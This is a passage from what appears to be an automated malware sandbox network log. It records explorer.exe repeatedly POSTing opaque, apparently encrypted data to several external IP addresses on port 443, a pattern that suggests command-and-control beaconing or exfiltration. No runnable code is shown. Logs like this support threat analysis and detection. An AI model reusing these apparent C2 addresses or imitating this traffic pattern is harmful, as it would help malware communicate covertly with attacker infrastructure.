                                              2024-07-23 04:16:32 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1288
                                              2024-07-23 04:16:32 UTC1288OUTData Raw: 6d 36 46 55 37 6f 74 50 56 79 2b 46 42 34 2f 42 33 41 31 6a 45 76 35 66 68 70 6b 57 49 34 41 4b 41 4b 70 64 55 51 45 42 6b 41 33 6c 77 39 59 50 47 49 74 50 55 49 58 50 4b 67 76 4a 77 5a 53 6f 67 68 63 73 65 33 63 73 59 53 62 6f 36 32 79 36 6d 39 2f 50 77 51 47 2f 34 4e 5a 54 62 78 4e 38 42 4c 4a 6e 42 69 36 66 30 41 37 74 74 38 47 76 4e 2f 79 72 58 78 77 69 63 4b 57 59 68 46 5a 38 2f 42 32 52 4a 47 57 45 79 66 41 2f 4b 51 47 43 74 75 58 6d 52 75 52 46 6e 47 49 61 4e 78 48 2f 6e 70 4d 59 49 30 2b 59 41 42 4b 42 46 44 4a 66 70 41 62 39 6f 46 64 74 49 79 42 4d 31 71 71 2b 65 33 37 70 42 73 30 32 77 46 4d 69 36 71 65 4a 6e 75 52 35 52 6f 68 48 6b 64 46 41 30 58 4a 53 77 72 61 4b 7a 4c 75 48 2b 63 34 75 54 64 48 6e 75 33 30 4e 63 4c 64 7a 56 68 35 49 76 6e 31
                                              Data Ascii: m6FU7otPVy+FB4/B3A1jEv5fhpkWI4AKAKpdUQEBkA3lw9YPGItPUIXPKgvJwZSoghcse3csYSbo62y6m9/PwQG/4NZTbxN8BLJnBi6f0A7tt8GvN/yrXxwicKWYhFZ8/B2RJGWEyfA/KQGCtuXmRuRFnGIaNxH/npMYI0+YABKBFDJfpAb9oFdtIyBM1qq+e37pBs02wFMi6qeJnuR5RohHkdFA0XJSwraKzLuH+c4uTdHnu30NcLdzVh5Ivn1
                                              2024-07-23 04:16:33 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:16:33 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:16:33 UTC685INData Raw: 4f 5a 32 4f 77 64 49 67 71 6a 64 30 4b 70 47 6b 67 74 56 4d 32 62 79 58 32 6a 79 66 72 53 38 78 4b 63 67 72 56 65 43 35 6d 4b 41 49 34 6e 72 4f 4a 30 68 65 37 71 4a 39 2b 39 2b 74 2f 4a 67 4f 5a 77 39 41 63 66 31 4c 30 2b 48 4f 56 50 68 2f 74 55 4b 34 45 4e 6e 6c 41 2b 6d 4f 43 6e 63 54 63 38 75 58 6d 42 53 30 4f 58 66 72 56 72 72 2b 42 48 6b 46 41 65 33 7a 66 6e 61 6d 57 66 32 59 54 50 34 74 68 62 73 4d 74 2f 50 52 4f 6f 7a 65 77 59 49 43 70 49 4f 52 54 66 30 6c 69 66 4f 73 2b 51 58 64 68 35 51 7a 74 68 4f 48 6e 59 4b 33 39 76 59 4d 66 6f 61 2f 50 79 31 39 65 44 4f 46 45 78 44 4c 68 74 70 43 6e 56 43 70 5a 2f 6f 68 65 42 2f 6c 38 73 68 31 47 52 50 65 72 70 6f 48 38 6c 65 5a 6a 6e 4d 69 46 32 35 61 34 4d 47 4f 59 78 31 69 42 4f 48 45 37 4f 78 71 76 53 49
                                              Data Ascii: OZ2OwdIgqjd0KpGkgtVM2byX2jyfrS8xKcgrVeC5mKAI4nrOJ0he7qJ9+9+t/JgOZw9Acf1L0+HOVPh/tUK4ENnlA+mOCncTc8uXmBS0OXfrVrr+BHkFAe3zfnamWf2YTP4thbsMt/PROozewYICpIORTf0lifOs+QXdh5QzthOHnYK39vYMfoa/Py19eDOFExDLhtpCnVCpZ/oheB/l8sh1GRPerpoH8leZjnMiF25a4MGOYx1iBOHE7OxqvSI


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.549736167.235.128.1534431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:16:34 UTC234OUTPOST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:16:34 UTC1267OUTData Raw: 41 72 4c 56 59 61 41 4f 55 53 44 71 75 61 76 52 32 2f 49 63 36 6e 58 6d 5a 77 6d 6f 32 64 35 49 62 61 6a 2f 69 4a 31 51 31 62 6a 4e 48 45 46 63 39 4d 62 6c 49 4a 33 76 47 71 6f 2b 51 43 61 33 53 76 43 53 4c 6a 44 5a 79 49 32 33 32 63 51 58 41 6c 43 46 31 66 75 77 6f 38 52 48 58 6b 42 4f 65 48 72 55 4f 67 75 6d 63 64 68 69 4e 6c 4f 38 43 58 4e 4d 4d 4c 77 4d 76 6b 37 55 65 41 64 39 42 6a 33 41 41 7a 67 57 68 33 4e 48 77 78 5a 6a 33 56 41 49 4c 42 41 70 38 53 6a 47 32 2f 66 68 6e 4f 53 51 4e 2b 4a 49 4f 51 75 6b 67 76 31 31 4d 35 77 62 45 61 64 73 6a 41 64 5a 37 78 6a 47 4a 4c 47 69 62 2f 41 53 7a 47 79 4c 58 59 41 59 62 76 6e 53 56 64 48 38 6d 64 4b 4e 79 65 4a 6e 32 33 5a 6c 65 63 41 33 44 74 65 35 45 73 4b 76 52 72 6d 4b 35 6e 72 59 39 55 70 30 51 63 6d
                                              Data Ascii: ArLVYaAOUSDquavR2/Ic6nXmZwmo2d5Ibaj/iJ1Q1bjNHEFc9MblIJ3vGqo+QCa3SvCSLjDZyI232cQXAlCF1fuwo8RHXkBOeHrUOgumcdhiNlO8CXNMMLwMvk7UeAd9Bj3AAzgWh3NHwxZj3VAILBAp8SjG2/fhnOSQN+JIOQukgv11M5wbEadsjAdZ7xjGJLGib/ASzGyLXYAYbvnSVdH8mdKNyeJn23ZlecA3Dte5EsKvRrmK5nrY9Up0Qcm
                                              2024-07-23 04:16:35 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:16:35 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:16:35 UTC685INData Raw: 4f 4f 73 31 37 41 6f 6f 54 46 6c 67 4c 38 4d 67 31 52 32 6c 30 66 33 39 30 4d 50 75 4a 48 30 53 7a 4a 6b 6e 41 63 6e 53 64 32 73 7a 43 66 68 4b 47 4d 78 62 53 7a 39 6d 73 47 34 63 77 66 4f 73 73 58 57 6d 30 41 59 41 6a 54 66 67 74 79 30 30 6c 75 57 62 6a 34 50 57 4b 30 57 77 46 39 2b 52 68 46 61 2f 42 55 4a 6d 4f 68 59 4a 63 63 6f 52 37 33 62 32 6a 75 2b 4e 4c 39 6d 43 6c 44 35 39 39 4b 65 64 6d 6f 44 51 76 62 56 53 62 39 44 42 37 64 48 70 77 63 4b 61 55 6d 76 67 6f 6f 4a 50 62 6a 73 70 45 2b 6a 4d 2f 54 59 50 45 79 50 31 4f 4c 53 4d 38 30 50 4d 76 36 34 32 4a 78 4b 2f 42 4a 54 50 61 62 73 36 35 41 49 76 55 4e 52 43 66 6f 67 74 49 46 49 54 4c 77 2f 36 4e 4e 31 43 79 55 63 62 72 2b 7a 46 38 45 79 4f 66 62 4c 6f 66 55 79 6c 79 76 56 41 75 69 41 6b 57 33 78
                                              Data Ascii: OOs17AooTFlgL8Mg1R2l0f390MPuJH0SzJknAcnSd2szCfhKGMxbSz9msG4cwfOssXWm0AYAjTfgty00luWbj4PWK0WwF9+RhFa/BUJmOhYJccoR73b2ju+NL9mClD599KedmoDQvbVSb9DB7dHpwcKaUmvgooJPbjspE+jM/TYPEyP1OLSM80PMv642JxK/BJTPabs65AIvUNRCfogtIFITLw/6NN1CyUcbr+zF8EyOfbLofUylyvVAuiAkW3x


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.549737107.173.160.1374431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:16:36 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:16:36 UTC1267OUTData Raw: 55 43 63 64 6a 6f 6a 47 51 78 49 2b 4a 49 7a 36 48 4e 51 52 55 34 68 30 35 53 4c 59 6f 49 77 68 42 57 4c 54 6f 2f 48 4b 49 67 66 69 44 46 57 52 52 56 34 6d 54 51 69 64 36 37 2b 6b 43 49 42 7a 74 45 59 75 4e 61 6e 76 46 45 41 67 41 6a 4e 56 78 46 76 4b 75 78 47 33 65 51 48 6e 72 66 38 4a 61 6d 44 4d 6c 53 79 74 73 41 41 7a 61 5a 54 46 50 2f 73 46 73 7a 38 4a 43 4a 6f 55 71 52 73 48 78 69 2f 59 57 51 62 66 77 46 39 4d 2f 53 34 6c 42 52 38 49 71 6f 30 66 4d 44 2b 43 32 75 46 48 42 2b 6d 45 2b 4e 67 6f 39 4f 77 32 52 36 57 79 7a 6b 43 63 51 47 44 4c 59 55 6b 4e 75 77 6f 6b 5a 5a 41 75 6d 73 7a 68 51 70 30 35 45 65 37 55 4e 54 35 50 41 35 33 4a 38 6b 4b 53 4c 70 6b 37 58 76 2f 32 64 65 67 75 2f 7a 33 72 6e 36 4a 6d 59 37 50 34 73 66 52 37 64 54 69 46 56 42 6a
                                              Data Ascii: UCcdjojGQxI+JIz6HNQRU4h05SLYoIwhBWLTo/HKIgfiDFWRRV4mTQid67+kCIBztEYuNanvFEAgAjNVxFvKuxG3eQHnrf8JamDMlSytsAAzaZTFP/sFsz8JCJoUqRsHxi/YWQbfwF9M/S4lBR8Iqo0fMD+C2uFHB+mE+Ngo9Ow2R6WyzkCcQGDLYUkNuwokZZAumszhQp05Ee7UNT5PA53J8kKSLpk7Xv/2degu/z3rn6JmY7P4sfR7dTiFVBj
                                              2024-07-23 04:16:42 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:16:42 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:16:42 UTC685INData Raw: 66 37 4c 54 6f 49 6e 38 44 50 69 70 6a 59 45 64 67 31 69 56 46 50 2f 6f 4d 52 50 75 4d 79 53 4a 74 78 46 52 71 52 34 62 36 78 36 72 50 75 6c 68 46 56 6a 2f 4a 2f 61 66 39 34 72 4a 4e 79 6a 4a 34 6b 59 73 47 49 73 2f 79 6e 38 6d 74 76 4b 63 66 4e 41 59 56 79 45 67 43 70 43 68 50 36 34 6f 4f 7a 57 6e 4d 6a 62 76 6f 31 53 70 77 53 4e 4f 42 2b 6e 4a 6e 53 63 67 67 4f 67 76 58 6c 65 63 37 65 54 51 38 74 4c 54 30 64 5a 35 32 43 57 65 4f 33 66 73 33 6f 4a 51 54 4a 43 76 39 65 47 54 4c 69 78 70 30 35 5a 66 50 33 59 52 54 31 37 6d 59 61 75 49 6e 42 6a 42 30 39 45 4c 2f 2b 41 58 49 52 4f 57 32 43 71 34 51 74 37 56 4e 34 4f 38 67 4b 75 73 75 67 35 64 4c 50 2f 4e 63 73 2f 4f 62 35 44 30 32 6a 54 78 35 39 39 36 32 6a 4d 79 76 31 36 62 74 31 43 38 70 6a 62 45 66 55 49
                                              Data Ascii: f7LToIn8DPipjYEdg1iVFP/oMRPuMySJtxFRqR4b6x6rPulhFVj/J/af94rJNyjJ4kYsGIs/yn8mtvKcfNAYVyEgCpChP64oOzWnMjbvo1SpwSNOB+nJnScggOgvXlec7eTQ8tLT0dZ52CWeO3fs3oJQTJCv9eGTLixp05ZfP3YRT17mYauInBjB09EL/+AXIROW2Cq4Qt7VN4O8gKusug5dLP/Ncs/Ob5D02jTx59962jMyv16bt1C8pjbEfUI


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.549738107.173.160.1394431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:16:43 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:16:43 UTC1267OUTData Raw: 53 36 45 51 4b 36 49 43 45 53 71 6f 77 4c 53 50 48 62 6f 55 76 43 32 36 61 49 41 65 71 65 69 46 6c 46 62 57 63 59 31 73 39 58 4b 58 37 78 55 34 6e 32 65 73 71 5a 57 45 47 6c 63 55 48 37 52 62 39 43 38 54 78 30 32 57 53 46 48 76 68 4f 74 4e 46 6a 35 42 41 4c 4a 65 48 43 31 71 71 30 55 2f 6c 4e 6c 53 76 4f 64 32 42 64 59 79 54 33 72 72 66 58 49 4d 57 39 6d 4c 57 76 54 79 6b 31 7a 46 31 6d 2f 70 33 36 7a 63 72 6b 30 4f 48 4e 41 77 70 31 46 63 65 4a 72 53 48 45 30 6e 33 52 2b 44 58 4c 35 65 72 72 75 6f 4c 2f 2b 55 64 76 42 7a 4b 6f 48 59 38 36 79 62 34 36 55 4b 66 50 4c 6b 48 76 69 4e 41 42 67 71 6f 31 6a 55 42 48 50 2b 6d 33 53 66 6a 65 46 74 31 62 4d 6a 7a 33 4c 63 62 71 75 30 6b 6f 30 33 4b 51 67 79 33 4a 32 71 73 6c 6e 30 42 36 6c 55 4a 4c 54 67 38 47 73
                                              Data Ascii: S6EQK6ICESqowLSPHboUvC26aIAeqeiFlFbWcY1s9XKX7xU4n2esqZWEGlcUH7Rb9C8Tx02WSFHvhOtNFj5BALJeHC1qq0U/lNlSvOd2BdYyT3rrfXIMW9mLWvTyk1zF1m/p36zcrk0OHNAwp1FceJrSHE0n3R+DXL5erruoL/+UdvBzKoHY86yb46UKfPLkHviNABgqo1jUBHP+m3SfjeFt1bMjz3Lcbqu0ko03KQgy3J2qsln0B6lUJLTg8Gs
                                              2024-07-23 04:17:04 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:04 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:17:04 UTC685INData Raw: 58 2b 73 39 4a 51 54 2f 7a 6a 5a 59 39 4e 52 7a 79 46 50 51 59 48 38 61 58 36 50 38 6f 71 33 7a 6f 65 75 77 63 5a 75 4d 62 35 4d 74 4b 66 77 47 31 45 6b 56 43 50 69 42 38 6a 2f 53 73 6a 67 38 42 63 67 45 64 2b 38 41 43 4d 35 49 63 6e 44 45 4c 79 56 76 4a 50 65 67 37 62 74 6c 56 68 53 38 2b 4f 37 36 73 6d 68 48 75 62 6d 67 41 59 73 54 7a 7a 4c 71 4e 59 50 79 72 44 30 6d 5a 33 6c 37 32 53 64 43 34 56 51 70 6e 4b 6e 4e 49 36 62 6a 65 35 37 72 52 75 70 49 4b 36 31 43 78 6e 76 63 6e 58 31 35 42 65 48 70 61 66 6a 66 6c 47 58 4c 67 56 2b 76 55 49 43 79 64 38 57 4f 7a 54 66 6b 78 61 56 55 78 36 49 54 34 77 5a 31 66 41 33 7a 71 54 6d 34 56 48 73 4d 69 39 4b 4d 52 63 69 4c 6c 6a 6d 47 32 55 6b 35 48 7a 4a 37 53 63 57 41 69 42 58 46 74 55 4c 70 62 53 49 61 31 32 4f
                                              Data Ascii: X+s9JQT/zjZY9NRzyFPQYH8aX6P8oq3zoeuwcZuMb5MtKfwG1EkVCPiB8j/Ssjg8BcgEd+8ACM5IcnDELyVvJPeg7btlVhS8+O76smhHubmgAYsTzzLqNYPyrD0mZ3l72SdC4VQpnKnNI6bje57rRupIK61CxnvcnX15BeHpafjflGXLgV+vUICyd8WOzTfkxaVUx6IT4wZ1fA3zqTm4VHsMi9KMRciLljmG2Uk5HzJ7ScWAiBXFtULpbSIa12O


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.549739167.235.128.1534431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:17:06 UTC234OUTPOST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:17:06 UTC1267OUTData Raw: 57 4d 67 43 4f 32 69 44 75 69 6c 69 30 5a 7a 51 2f 74 66 42 42 53 45 63 33 32 44 32 45 63 4d 72 79 36 34 41 6e 47 7a 33 6d 34 50 52 6a 32 75 74 75 6b 34 38 68 4b 49 35 32 57 49 5a 6b 55 68 6a 61 63 45 5a 46 62 33 78 6c 4e 69 42 65 58 50 37 52 58 72 65 74 43 55 7a 30 79 64 47 42 39 66 55 63 6c 6b 57 73 34 2f 68 69 74 6e 4b 74 79 65 6a 62 72 76 62 2f 56 6a 57 79 5a 74 4f 49 38 45 2b 68 67 55 44 70 59 68 6b 32 66 4b 50 78 51 7a 4c 4f 37 66 58 50 70 76 72 76 4d 56 33 78 35 6a 2b 70 4d 6e 61 35 61 6b 30 67 6c 48 43 74 66 51 32 4b 62 65 44 4c 57 63 48 4e 4e 6c 75 70 7a 33 6d 4d 68 5a 50 70 75 31 73 32 6e 55 66 37 42 7a 58 70 41 39 47 70 63 6a 79 75 4b 59 78 68 53 69 70 57 43 64 6a 57 4a 56 43 54 4f 55 4a 45 73 52 52 2b 5a 44 4f 68 44 48 63 70 49 63 4a 6a 6b 33
                                              Data Ascii: WMgCO2iDuili0ZzQ/tfBBSEc32D2EcMry64AnGz3m4PRj2utuk48hKI52WIZkUhjacEZFb3xlNiBeXP7RXretCUz0ydGB9fUclkWs4/hitnKtyejbrvb/VjWyZtOI8E+hgUDpYhk2fKPxQzLO7fXPpvrvMV3x5j+pMna5ak0glHCtfQ2KbeDLWcHNNlupz3mMhZPpu1s2nUf7BzXpA9GpcjyuKYxhSipWCdjWJVCTOUJEsRR+ZDOhDHcpIcJjk3
                                              2024-07-23 04:17:06 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:06 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:17:06 UTC685INData Raw: 6c 65 39 64 4d 55 31 39 66 50 49 44 63 39 61 65 54 6c 42 33 4d 4b 4e 61 2f 58 2b 32 50 38 64 52 7a 64 43 64 4d 4c 46 63 6b 73 48 4d 4f 68 69 4a 59 4e 4d 6c 6c 33 4c 67 39 5a 6b 51 4a 47 46 52 36 6f 4b 2b 4f 48 2b 6a 4b 38 4d 32 32 6b 36 2b 58 34 58 45 50 41 77 57 30 73 4d 35 6e 6a 71 49 77 42 5a 6c 46 6a 6b 4d 38 59 2b 31 4e 6e 45 46 64 44 74 39 55 43 75 46 2f 4d 54 6f 4f 47 47 52 49 34 6b 2b 73 74 6b 71 61 69 34 76 76 35 65 44 6f 46 56 4b 49 74 7a 75 6a 7a 75 76 74 45 6c 41 66 34 4a 33 32 62 36 56 78 74 66 55 36 4d 67 31 4b 4d 7a 31 72 67 33 45 42 33 49 51 6d 4a 4b 73 56 68 64 31 66 2b 48 7a 50 6f 31 64 4d 68 43 2b 6d 71 61 33 69 4f 59 33 69 6b 2f 6d 32 35 42 30 53 61 77 43 50 57 2b 52 49 4d 6b 68 4e 69 45 71 7a 6e 46 35 37 68 73 72 4a 51 63 4d 32 32 6f
                                              Data Ascii: le9dMU19fPIDc9aeTlB3MKNa/X+2P8dRzdCdMLFcksHMOhiJYNMll3Lg9ZkQJGFR6oK+OH+jK8M22k6+X4XEPAwW0sM5njqIwBZlFjkM8Y+1NnEFdDt9UCuF/MToOGGRI4k+stkqai4vv5eDoFVKItzujzuvtElAf4J32b6VxtfU6Mg1KMz1rg3EB3IQmJKsVhd1f+HzPo1dMhC+mqa3iOY3ik/m25B0SawCPW+RIMkhNiEqznF57hsrJQcM22o


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.549740107.173.160.1374431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:17:07 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:17:07 UTC1267OUTData Raw: 47 54 41 6e 37 58 46 2b 7a 67 78 7a 42 59 45 51 79 62 37 65 6c 44 37 65 53 31 59 70 49 55 64 4b 6f 36 4e 77 4d 59 7a 78 42 66 49 7a 4d 6b 48 57 32 4e 4b 55 71 6e 6c 64 48 4e 33 52 79 71 48 57 33 44 48 46 64 68 7a 72 48 2b 4f 5a 79 43 44 62 45 73 71 53 37 4e 59 45 41 6a 58 34 32 4b 38 6b 45 67 53 7a 45 4b 39 53 38 6c 58 39 44 36 4b 58 34 63 4e 70 76 4a 63 79 45 77 58 37 4f 59 38 63 77 65 36 38 55 68 50 51 79 75 30 59 48 48 65 6d 58 79 66 6f 30 52 47 6e 6b 6a 50 64 45 72 71 74 4f 44 7a 74 4d 6f 4b 6c 6e 73 52 64 34 66 2f 63 70 65 53 72 6e 4d 4c 46 69 4a 41 77 52 57 45 51 56 4b 6d 57 36 64 54 68 72 69 2b 44 4d 4f 47 73 62 48 46 7a 78 31 34 78 53 31 7a 44 55 65 59 6d 75 41 4b 66 4f 70 55 6e 4a 75 71 31 49 37 4e 52 6b 57 74 6d 69 67 6f 39 66 6f 70 53 4e 63 42
                                              Data Ascii: GTAn7XF+zgxzBYEQyb7elD7eS1YpIUdKo6NwMYzxBfIzMkHW2NKUqnldHN3RyqHW3DHFdhzrH+OZyCDbEsqS7NYEAjX42K8kEgSzEK9S8lX9D6KX4cNpvJcyEwX7OY8cwe68UhPQyu0YHHemXyfo0RGnkjPdErqtODztMoKlnsRd4f/cpeSrnMLFiJAwRWEQVKmW6dThri+DMOGsbHFzx14xS1zDUeYmuAKfOpUnJuq1I7NRkWtmigo9fopSNcB
                                              2024-07-23 04:17:08 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:08 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:17:08 UTC685INData Raw: 63 57 47 31 34 39 33 75 52 38 56 44 7a 39 33 67 43 33 42 56 75 67 6c 32 2b 45 34 74 31 79 55 64 61 55 71 44 2b 75 43 36 72 6d 51 69 4d 58 30 39 35 61 6f 47 6d 77 57 57 58 76 70 6f 53 55 77 5a 36 6c 74 63 6f 62 6c 78 55 68 50 65 48 76 59 38 58 30 56 6a 62 5a 72 78 53 51 54 4a 58 56 50 4f 50 63 43 72 2f 38 47 5a 34 4f 49 66 44 6d 37 6e 73 75 71 66 43 52 4e 30 41 6e 33 6a 4f 2b 78 4e 48 48 56 72 2f 64 4a 62 49 2b 36 4b 43 41 45 50 6a 58 52 41 4c 63 2b 6d 6d 4e 34 47 66 55 4e 76 41 67 55 2b 78 78 34 5a 45 72 63 63 6b 68 4e 2f 55 33 63 7a 69 32 36 39 78 31 78 74 4a 6a 68 74 4b 56 2f 4d 66 62 66 64 77 39 78 6e 2b 66 43 74 59 76 39 6c 79 59 41 62 31 6e 4b 48 34 64 6a 49 76 42 75 6a 31 6c 71 69 2f 68 4f 33 68 58 4c 5a 39 57 66 71 63 6a 53 4c 53 44 78 58 6d 51 43
                                              Data Ascii: cWG1493uR8VDz93gC3BVugl2+E4t1yUdaUqD+uC6rmQiMX095aoGmwWWXvpoSUwZ6ltcoblxUhPeHvY8X0VjbZrxSQTJXVPOPcCr/8GZ4OIfDm7nsuqfCRN0An3jO+xNHHVr/dJbI+6KCAEPjXRALc+mmN4GfUNvAgU+xx4ZErcckhN/U3czi269x1xtJjhtKV/Mfbfdw9xn+fCtYv9lyYAb1nKH4djIvBuj1lqi/hO3hXLZ9WfqcjSLSDxXmQC


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.549741107.173.160.1394431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:17:09 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:17:09 UTC1122OUTData Raw: 70 49 55 59 4d 64 71 62 32 41 63 62 59 6d 73 38 58 2f 54 74 66 41 44 39 76 37 74 39 31 36 78 79 43 4a 52 30 44 55 76 67 4e 7a 62 47 65 4e 44 69 6d 64 59 75 33 74 64 70 35 2f 6e 43 42 37 77 57 4f 73 52 32 30 44 62 46 7a 64 58 76 6d 73 4a 75 61 5a 70 52 61 7a 51 4a 30 51 43 72 2f 32 69 61 4a 57 57 32 73 7a 7a 7a 45 35 70 4e 6e 6e 72 30 4f 67 78 4e 56 6e 33 4f 4a 4c 57 2f 30 6a 57 76 48 6f 6d 4a 6e 66 44 5a 57 39 58 77 45 58 69 72 7a 6b 50 4a 67 39 49 74 44 77 63 46 34 31 78 68 33 6a 36 6b 39 4c 67 66 57 4b 58 79 67 66 59 33 65 64 2b 64 34 2f 4a 35 34 50 66 33 49 66 71 32 74 66 74 55 35 4a 69 58 38 4e 49 55 65 5a 4b 6d 7a 79 63 68 33 31 44 2f 69 6b 61 51 49 58 65 48 6f 2f 32 6f 2f 55 62 51 72 5a 6a 4e 41 4b 37 41 70 44 63 58 2f 76 4d 41 35 49 39 6c 37 4a 48
                                              Data Ascii: pIUYMdqb2AcbYms8X/TtfAD9v7t916xyCJR0DUvgNzbGeNDimdYu3tdp5/nCB7wWOsR20DbFzdXvmsJuaZpRazQJ0QCr/2iaJWW2szzzE5pNnnr0OgxNVn3OJLW/0jWvHomJnfDZW9XwEXirzkPJg9ItDwcF41xh3j6k9LgfWKXygfY3ed+d4/J54Pf3Ifq2tftU5JiX8NIUeZKmzych31D/ikaQIXeHo/2o/UbQrZjNAK7ApDcX/vMA5I9l7JH
                                              2024-07-23 04:17:11 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:10 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:17:11 UTC685INData Raw: 4d 46 72 30 48 59 68 36 74 72 4e 61 4d 64 47 45 64 61 77 6c 6e 66 64 56 43 58 4d 62 30 55 4c 51 51 77 67 34 55 49 65 66 64 6a 4d 30 55 4b 56 36 4f 77 7a 51 73 43 76 2f 65 6c 74 74 37 70 79 56 73 41 35 69 43 4b 4f 75 4c 44 58 45 36 42 62 74 31 33 73 71 73 75 6f 4b 49 4a 42 49 42 61 67 47 34 6e 4b 54 6d 4d 32 55 74 35 36 32 37 7a 6b 6e 63 2b 43 46 78 2b 74 61 46 79 37 68 32 41 47 77 4b 35 64 4d 66 69 4f 76 73 49 72 74 63 39 38 79 5a 65 49 65 78 6f 39 37 47 6b 56 78 73 5a 6d 47 50 74 57 70 39 6d 57 36 62 68 31 4f 58 74 59 64 6d 68 37 31 33 4a 62 7a 48 69 4d 45 2f 56 5a 2b 6f 45 75 58 6c 47 4a 75 6d 39 2f 72 4a 5a 33 32 4a 76 51 41 65 44 79 6e 48 32 39 65 6c 35 6e 34 34 59 66 37 30 76 34 63 76 52 63 52 54 2b 69 72 32 55 37 6f 6b 2b 6d 55 68 6d 43 6c 46 56 4b
                                              Data Ascii: MFr0HYh6trNaMdGEdawlnfdVCXMb0ULQQwg4UIefdjM0UKV6OwzQsCv/eltt7pyVsA5iCKOuLDXE6Bbt13sqsuoKIJBIBagG4nKTmM2Ut5627zknc+CFx+taFy7h2AGwK5dMfiOvsIrtc98yZeIexo97GkVxsZmGPtWp9mW6bh1OXtYdmh713JbzHiME/VZ+oEuXlGJum9/rJZ32JvQAeDynH29el5n44Yf70v4cvRcRT+ir2U7ok+mUhmClFVK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.549742167.235.128.1534431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:17:11 UTC234OUTPOST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
